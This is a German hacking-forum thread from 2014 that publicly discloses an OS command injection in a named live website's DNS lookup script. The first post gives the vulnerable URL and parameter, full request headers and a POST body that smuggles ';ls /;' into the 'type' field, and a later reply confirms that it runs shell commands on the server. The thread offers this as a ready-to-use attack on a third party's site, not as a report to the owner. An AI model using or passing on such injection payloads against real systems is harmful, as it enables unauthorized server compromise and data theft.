Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

www.tools.mywikiinfo.com - OS Command Injection

- - - - -
Erstellt von Zero-X ,

  • Bitte melde dich an um zu Antworten
2 Antworten in diesem Thema

#1
Zero-X
Geschrieben 01 December 2014 - 14:30 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
URL:
http://www.tools.mywikiinfo.com/includes/dnslookup.php

Der Parameter "type" ist verwundbar.

Mit Live HTTP Headers übertragen wir folgende Daten:

Im Feld HTTP Header:
Host: www.tools.mywikiinfo.com
User-Agent: XXX
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.tools.mywikiinfo.com/dnslookup.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

Bei POST Inhalt senden:
host=google.com&type=A;ls /;&submit=Lookup&dnslookup=dnslookup

Live HTTP Headers funktioniert ab Firefox 32 nicht mehr richtig.
Hier ist eine Anleitung, wie man es wieder zum laufen bringt. Habe es selbst getestet und bei mir hat alles unter Linux und Windows wieder funktioniert.

Please Login HERE or Register HERE to see this link!


  • Schakal gefällt das

#2
Mr_NiceGuy
Geschrieben 01 December 2014 - 20:33 Uhr

Mr_NiceGuy

    Tool Tester

  • Premium Member
    • Likes
    82
  • 116 Beiträge
  • 161 Bedankt
Was bringt das jetzt genau? :D

Eingefügtes Bild
--Die Existenz des Lebens ist ein höchst Überbewertetes Phänomen.--

#3
Zero-X
Geschrieben 02 December 2014 - 09:52 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Du kannst Shell Befehle über das verwundbare PHP-Skript ausführen. :)
Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 38 user(s)


    , 0*ptr, abramas, and6578, Anhed0nic, bbxhnr, BlackZetsu, Ch!ller, chimchoca7, CyberFlash, dos, Drikerise, FakeKeyUser, FalkE, FatalityMods, Framerater, herp, jinx, Laggy, Maximalx3, most_uniQue, Mr_NiceGuy, nong_dan, Osed28, PaulaAbdul, paulaner, pdr0, R3s1stanc3, SAR, Schakal, SepaX, Streetboz, ueEqlL, Unkiii, Uwe201169, Xenio, XoiL, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking